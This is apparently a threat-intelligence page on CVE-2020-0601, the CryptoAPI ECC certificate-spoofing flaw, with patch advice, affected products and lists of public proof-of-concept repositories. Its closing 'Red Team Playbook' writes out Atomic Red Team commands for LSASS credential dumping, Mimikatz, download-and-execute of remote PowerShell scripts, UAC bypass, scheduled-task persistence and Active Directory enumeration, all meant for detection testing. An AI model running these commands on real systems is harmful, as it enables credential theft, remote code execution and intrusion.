CVE-2020-0601
Overview
This vulnerability is a certificate validation bypass in the Windows CryptoAPI component (Crypt32.dll) related to Elliptic Curve Cryptography (ECC) certificates. The root cause lies in improper validation logic within the ECC certificate chain verification process, allowing spoofed certificates to be accepted as legitimate. This flaw specifically affects the certificate validation routines responsible for authenticating ECC-based code-signing certificates in Microsoft Windows.
Vulnerability Description
A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates.An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source, aka 'Windows CryptoAPI Spoofing Vulnerability'.
Impact
An unauthenticated attacker can exploit this vulnerability by signing malicious executables with spoofed ECC certificates that appear trusted by the system. This enables execution of malicious code with the appearance of legitimacy, facilitating attacks such as malware installation, evasion of security controls, and unauthorized code execution. The exploit requires no user authentication and only minimal user interaction, such as opening a signed file, potentially leading to system compromise and erosion of trust in signed binaries within affected Windows environments.
Solution
Microsoft has released security updates addressing this vulnerability in Windows 10 versions 1507, 1607, and 1709. Administrators should apply the patches detailed in the Microsoft Security Advisory available at https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601. The updates correct the certificate validation logic in Crypt32.dll. No alternative workarounds are recommended; applying the official security update is the prescribed remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
A significant spoofing vulnerability exists in the Windows CryptoAPI, specifically within the Crypt32.dll component, which is responsible for handling cryptographic functions, including the validation of certificates. This flaw arises from improper validation of Elliptic Curve Cryptography (ECC) certificates, allowing an attacker to create a malicious executable that appears to be signed by a legitimate entity. By exploiting this vulnerability, an attacker can effectively bypass security measures that rely on certificate validation, leading to the potential execution of harmful software under the guise of trusted applications.
The attack vector for this vulnerability is particularly concerning due to its simplicity and effectiveness. An adversary could generate a spoofed code-signing certificate that mimics a legitimate one, thereby signing malicious code. This signed executable could then be distributed through various channels, including email attachments, software updates, or compromised websites. Once executed, the malicious code could perform a range of harmful activities, such as data exfiltration, system compromise, or lateral movement within a network. The ease with which an attacker can exploit this vulnerability makes it a prime target for cybercriminals seeking to infiltrate systems and networks.
The real-world impact of this vulnerability is profound, especially for organizations that rely heavily on the integrity of software and digital signatures. The ability for an attacker to masquerade as a trusted source poses significant risks, including financial loss, reputational damage, and potential legal ramifications. Businesses may face disruptions in operations, loss of sensitive data, and the costs associated with incident response and remediation. Furthermore, the trust that users and clients place in software products can be severely undermined, leading to long-term consequences for brand loyalty and customer confidence.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating systems and applying security patches is essential, as it helps to close known vulnerabilities. Additionally, employing advanced threat detection solutions that monitor for unusual behavior or unauthorized code execution can provide an added layer of defense. Organizations should also consider implementing certificate transparency logs and monitoring for any unauthorized certificate issuance. Educating employees about the risks associated with executing unsigned or suspicious software can further reduce the likelihood of successful exploitation.
In conclusion, the spoofing vulnerability within the Windows CryptoAPI represents a critical threat that can be exploited by attackers to compromise systems and undermine trust in software integrity. Organizations must prioritize the detection and mitigation of such vulnerabilities to safeguard their assets and maintain the confidence of their users. By adopting proactive security measures and fostering a culture of cybersecurity awareness, businesses can better protect themselves against the evolving landscape of cyber threats.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2020-0601, indicating renewed adversary interest and potential exploitation attempts. This resurgence is underscored by the appearance of new proof-of-concept exploits circulating within the security community, which may lower the technical barriers for threat actors to weaponize this vulnerability. Although ransomware groups previously associated with this vulnerability remain unconfirmed in active campaigns, the increased telemetry suggests heightened reconnaissance or preparatory actions that could precede exploitation. The elevated detection trend, combined with the vulnerability’s high EPSS score and critical nature, necessitates a reassessment of the threat landscape: the risk level has shifted from dormant to active, signaling that defenders should anticipate more frequent and sophisticated attempts to leverage this spoofing flaw. This development underscores the importance of continuous monitoring and rapid response capabilities to detect exploitation attempts early in their lifecycle.
Update 2 — May 16, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2020-0601, with telemetry indicating a significant uptick in reconnaissance and potential exploitation attempts. This surge is accompanied by the continued availability of multiple new proof-of-concept exploits on public platforms, which lowers the barrier for adversaries to weaponize this vulnerability. Although ransomware groups previously linked to this vulnerability remain unconfirmed in active campaigns, the increased adversary interest heightens the likelihood of opportunistic exploitation, especially given the vulnerability’s high EPSS score and critical impact on certificate validation. This evolving landscape elevates the threat level from latent to actively targeted, underscoring an urgent need for defenders to enhance monitoring and detection capabilities to identify early signs of exploitation.
Affected Products (26)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Microsoft | Windows 10 1507 | N/A |
cpe:2.3:o:microsoft:windows_10_1507:-:*:*:*:*:*:x64:*
|
|
|
Microsoft | Windows 10 1507 | N/A |
cpe:2.3:o:microsoft:windows_10_1507:-:*:*:*:*:*:x86:*
|
|
|
Microsoft | Windows 10 1607 | N/A |
cpe:2.3:o:microsoft:windows_10_1607:-:*:*:*:*:*:x64:*
|
|
|
Microsoft | Windows 10 1607 | N/A |
cpe:2.3:o:microsoft:windows_10_1607:-:*:*:*:*:*:x86:*
|
|
|
Microsoft | Windows 10 1709 | N/A |
cpe:2.3:o:microsoft:windows_10_1709:-:*:*:*:*:*:arm64:*
|
|
|
Microsoft | Windows 10 1709 | N/A |
cpe:2.3:o:microsoft:windows_10_1709:-:*:*:*:*:*:x64:*
|
|
|
Microsoft | Windows 10 1709 | N/A |
cpe:2.3:o:microsoft:windows_10_1709:-:*:*:*:*:*:x86:*
|
|
|
Microsoft | Windows 10 1803 | N/A |
cpe:2.3:o:microsoft:windows_10_1803:-:*:*:*:*:*:arm64:*
|
|
|
Microsoft | Windows 10 1803 | N/A |
cpe:2.3:o:microsoft:windows_10_1803:-:*:*:*:*:*:x64:*
|
|
|
Microsoft | Windows 10 1803 | N/A |
cpe:2.3:o:microsoft:windows_10_1803:-:*:*:*:*:*:x86:*
|
|
|
Microsoft | Windows 10 1809 | All |
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:arm64:*
|
|
|
Microsoft | Windows 10 1809 | All |
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*
|
|
|
Microsoft | Windows 10 1809 | All |
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*
|
|
|
Microsoft | Windows 10 1903 | N/A |
cpe:2.3:o:microsoft:windows_10_1903:-:*:*:*:*:*:arm64:*
|
|
|
Microsoft | Windows 10 1903 | N/A |
cpe:2.3:o:microsoft:windows_10_1903:-:*:*:*:*:*:x64:*
|
|
|
Microsoft | Windows 10 1903 | N/A |
cpe:2.3:o:microsoft:windows_10_1903:-:*:*:*:*:*:x86:*
|
|
|
Microsoft | Windows 10 1909 | N/A |
cpe:2.3:o:microsoft:windows_10_1909:-:*:*:*:*:*:arm64:*
|
|
|
Microsoft | Windows 10 1909 | N/A |
cpe:2.3:o:microsoft:windows_10_1909:-:*:*:*:*:*:x64:*
|
|
|
Microsoft | Windows 10 1909 | N/A |
cpe:2.3:o:microsoft:windows_10_1909:-:*:*:*:*:*:x86:*
|
|
|
Microsoft | Windows Server 1803 | N/A |
cpe:2.3:o:microsoft:windows_server_1803:-:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Microsoft Windows - CryptoAPI (Crypt32.dll) Elliptic Curve Cryptography (ECC) Spoof Code-Signing Certificate | Oliver Lyak | local | windows | - | View |
GitHub PoCs (35)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ly4k/CurveBall
PoC for CVE-2020-0601- Windows CryptoAPI (Crypt32.dll)
|
ly4k | 888 | 256 | 2020-01-15 | View |
|
kudelskisecurity/chainoffools
A PoC for CVE-2020-0601
|
kudelskisecurity | 335 | 81 | 2020-01-15 | View |
|
gentilkiwi/curveball
CVE-2020-0601 #curveball - Alternative Key Calculator
|
gentilkiwi | 77 | 14 | 2020-01-20 | View |
|
saleemrashid/badecparams
Proof of Concept for CVE-2020-0601
|
saleemrashid | 66 | 13 | 2020-01-16 | View |
|
0xxon/cve-2020-0601
Zeek package to detect CVE-2020-0601
|
0xxon | 35 | 9 | 2020-01-15 | View |
|
eastmountyxz/CVE-2020-0601-EXP
这资源是作者复现微软签字证书漏洞CVE-2020-0601,结合相关资源及文章实现。推荐大家结合作者博客,理解ECC算法、Windows验证机制,并尝试自己复现可执行文件签名证书和HTTPS劫持的例子。作为网络安全初学者,自己确实很菜,但希...
|
eastmountyxz | 30 | 2 | 2020-02-17 | View |
|
ioncodes/Curveball
PoC for CVE-2020-0601 - CryptoAPI exploit
|
ioncodes | 20 | 4 | 2020-01-28 | View |
|
0xxon/cve-2020-0601-plugin
Zeek package that uses OpenSSL to detect CVE-2020-0601 exploit attempts
|
0xxon | 5 | 3 | 2020-01-15 | View |
|
RrUZi/Awesome-CVE-2020-0601
😂An awesome curated list of repos for CVE-2020-0601.
|
RrUZi | 5 | 2 | 2020-01-16 | View |
|
IIICTECH/-CVE-2020-0601-ECC---EXPLOIT
CurveBall (CVE-2020-0601) - PoC CVE-2020-0601, or commonly referred to as CurveBall, is a vulnerability in which the si...
|
IIICTECH | 3 | 2 | 2020-01-19 | View |
|
nissan-sudo/CVE-2020-0601
Remote Code Execution Exploit
|
nissan-sudo | 2 | 2 | 2020-01-14 | View |
|
gremwell/cve-2020-0601_poc
CVE-2020-0601 proof of concept
|
gremwell | 2 | 2 | 2020-02-18 | View |
|
talbeerysec/CurveBallDetection
Resources related to CurveBall (CVE-2020-0601) detection
|
talbeerysec | 1 | 3 | 2020-02-03 | View |
|
BlueTeamSteve/CVE-2020-0601
Curated list of CVE-2020-0601 resources
|
BlueTeamSteve | 1 | 2 | 2020-01-16 | View |
|
yanghaoi/CVE-2020-0601
PoC for CVE-2020-0601- Windows CryptoAPI (Crypt32.dll) POC: https://github.com/ollypwn/CurveBall
|
yanghaoi | 1 | 2 | 2020-02-03 | View |
|
0xxon/cve-2020-0601-utils
C++ based utility to check if certificates are trying to exploit CVE-2020-0601
|
0xxon | 0 | 3 | 2020-01-17 | View |
|
YoannDqr/CVE-2020-0601
CurveBall CVE exploitation
|
YoannDqr | 2 | 1 | 2020-01-17 | View |
|
SherlockSec/CVE-2020-0601
A Windows Crypto Exploit
|
SherlockSec | 1 | 1 | 2020-01-15 | View |
|
Doug-Moody/Windows10_Cumulative_Updates_PowerShell
Powershell to patch CVE-2020-0601 . Complete security rollup for Windows 10 1507-1909
|
Doug-Moody | 1 | 1 | 2020-01-17 | View |
|
Hans-MartinHannibalLauridsen/CurveBall
CVE-2020-0601: Windows CryptoAPI Vulnerability. (CurveBall/ChainOfFools)
|
Hans-MartinHannibalLauridsen | 1 | 1 | 2020-01-23 | View |
|
amlweems/gringotts
proof of concept for CVE-2020-0601
|
amlweems | 1 | 1 | 2020-01-29 | View |
|
eastmountyxz/CVE-2018-20250-WinRAR
这资源是作者复现微软签字证书漏洞CVE-2020-0601,结合相关资源及文章实现。推荐大家结合作者博客,复现了该漏洞和理解恶意软件自启动劫持原理。作为网络安全初学者,自己确实很菜,但希望坚持下去,一起加油!
|
eastmountyxz | 1 | 1 | 2020-02-17 | View |
|
MarkusZehnle/CVE-2020-0601
|
MarkusZehnle | 0 | 2 | 2020-01-17 | View |
|
CrackerCat/CurveballCertTool
PoC for CVE-2020-0601 vulnerability (Code Signing)
|
CrackerCat | 0 | 2 | 2020-02-12 | View |
|
thimelp/cve-2020-0601-Perl
Perl version of recently published scripts to build ECC certificates with specific parameters re CVE-2020-0601
|
thimelp | 0 | 1 | 2020-01-18 | View |
|
dlee35/curveball_lua
Repo containing lua scripts and PCAP to find CVE-2020-0601 exploit attempts via network traffic
|
dlee35 | 0 | 1 | 2020-01-19 | View |
|
Ash112121/CVE-2020-0601
|
Ash112121 | 0 | 1 | 2020-01-20 | View |
|
apodlosky/PoC_CurveBall
PoC for "CurveBall" CVE-2020-0601
|
apodlosky | 0 | 1 | 2020-01-25 | View |
|
bsides-rijeka/meetup-2-curveball
Materials for the second Rijeka secuity meetup. We will be discussing Microsoft cryptoapi vulnerability dubbed CurveBall...
|
bsides-rijeka | 0 | 1 | 2020-02-26 | View |
|
exploitblizzard/CVE-2020-0601-spoofkey
|
exploitblizzard | 0 | 1 | 2020-03-03 | View |
|
ShayNehmad/twoplustwo
Implementing CVE-2020-0601
|
ShayNehmad | 0 | 1 | 2020-03-12 | View |
|
JPurrier/CVE-2020-0601
|
JPurrier | 0 | 1 | 2020-01-15 | View |
|
okanulkr/CurveBall-CVE-2020-0601-PoC
|
okanulkr | 0 | 0 | 2021-01-17 | View |
|
JoelBts/CVE-2020-0601_PoC
Demonstration of CVE-2020-0601 aka curveball. Based on the PoC's available at https://github.com/kudelskisecurity/chaino...
|
JoelBts | 0 | 0 | 2024-05-16 | View |
|
tyj956413282/curveball-plus
simulation experiment of Curveball (CVE-2020-0601) attacks under ECQV implicit certificates with Windows-like verifiers
|
tyj956413282 | 0 | 0 | 2023-09-09 | View |
Threat Feed
21 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AmmyyAdmin, AnyDesk, Atera (552 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-459 | Creating a Rogue Certification Authority Certificate |
38%
|
Medium | Very High | |
| CAPEC-475 | Signature Spoofing by Improper Validation |
34%
|
Low | High |
Red Team Playbook
76 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
